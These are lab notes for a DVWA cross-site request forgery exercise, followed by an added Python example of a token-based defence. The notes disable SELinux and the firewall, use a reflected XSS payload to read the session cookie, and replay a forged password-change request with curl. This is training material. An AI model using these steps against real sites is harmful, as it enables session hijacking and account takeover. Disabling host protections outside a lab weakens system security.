Cross Site Request Forgery
Server:
sestatus
If "SELinux status:" is disabled or "Current mode:" is permissive, skip the next steps and continue to the next section.
If "SELinux status:" is enabled and "Current mode:" is enforcing, continue with the next steps.
SELinux should be in disabled mode.
Change the current mode to permissive:
echo 0 > /selinux/enforce
Disable the firewall:
service iptables save
service iptables stop
Client:
Open the CSRF page
New password: abc123
Confirm new password: abc123
Click Change
Copy the URL after changing the password
Put it in a text editor / untitled file (A)
Log out
Log in with the new password
Open the XSS reflected page
What's your Name? <script>alert(document.cookie)</script>
Click Submit
Copy the contents of the alert
Paste it into the same file (B)
curl --cookie "B" --location "A"
This becomes:
curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location "http://192.168.43.207/dvwa/vulnerabilities/csrf/?password_new=test123&password_conf=test123&Change=Change#"
Change the password:
curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location "http://192.168.43.207/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#"
Go to the terminal
<change-password command> | grep "Password Changed" | tee curl.txt
Now log out and log in again
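
The password change above is accepted because the request needs nothing except the session cookie. Added example (not part of the original notes and not DVWA's code): the same action next to a version that requires POST and a session-bound token. SERVER_KEY, the function names, the user_token field and the sample session ID are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Assumption: per-deployment secret kept server-side only (constructed here).
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Token embedded as a hidden field in the password form for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def change_password_vulnerable(method, session_id, params):
    """Mirrors the behaviour exercised above: a valid cookie alone is enough."""
    if params.get("password_new") == params.get("password_conf"):
        return "Password Changed"
    return "Passwords did not match"


def change_password_hardened(method, session_id, params):
    """Same action, but state changes need POST plus a session-bound token."""
    if method != "POST":
        return "Rejected: state change must use POST"
    expected = issue_token(session_id).encode()
    supplied = params.get("user_token", "").encode()  # hypothetical field name
    # Constant-time comparison avoids leaking the token byte by byte.
    if not hmac.compare_digest(expected, supplied):
        return "Rejected: missing or invalid CSRF token"
    if params.get("password_new") != params.get("password_conf"):
        return "Passwords did not match"
    return "Password Changed"


# Constructed sample data: same parameter names as the lab URL, no token.
SESSION = "constructed-session-id"
FORGED = {"password_new": "test123", "password_conf": "test123", "Change": "Change"}

if __name__ == "__main__":
    print(change_password_vulnerable("GET", SESSION, FORGED))
    print(change_password_hardened("GET", SESSION, FORGED))
    print(change_password_hardened("POST", SESSION, FORGED))
    legit = dict(FORGED, user_token=issue_token(SESSION))
    print(change_password_hardened("POST", SESSION, legit))
```

A token does not help once the session cookie itself has been read through XSS, as in the steps above; that path is closed by fixing the XSS and marking the cookie HttpOnly.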